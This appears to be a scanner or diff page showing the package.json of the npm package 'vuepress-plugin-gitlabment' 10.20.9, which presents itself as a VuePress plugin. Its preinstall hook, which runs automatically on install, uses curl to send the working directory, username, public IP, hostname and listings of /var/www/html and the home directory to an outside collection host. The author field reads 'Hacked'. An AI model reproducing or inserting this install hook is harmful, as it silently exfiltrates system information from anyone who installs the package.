vuepress-plugin-gitlabment 10.20.9

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +15 -0
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "vuepress-plugin-gitlabment",
3
+ "version": "10.20.9",
4
+ "main": "main.js",
5
+ "scripts": {
6
+ "preinstall": "curl tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/pwd=$(pwd) && curl tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/whoami=$(whoami)&&curl tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/package=$(echo 'vuepress-plugin-gitlabment') && curl tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/ip=$(curl ifconfig.me)&& curl -X POST -d \"data=$(ls -R /var/www/html/)\" tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/hostname=$(hostname) && curl -X POST -d \"data=$(cd;ls -la)\" tcissweytqjhmiwohtrdcnhrwqtshugcw.oast.fun/home-dir",
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "Hacked",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "lodash": "^4.17.21"
13
+ },
14
+ "description": ""
15
+ }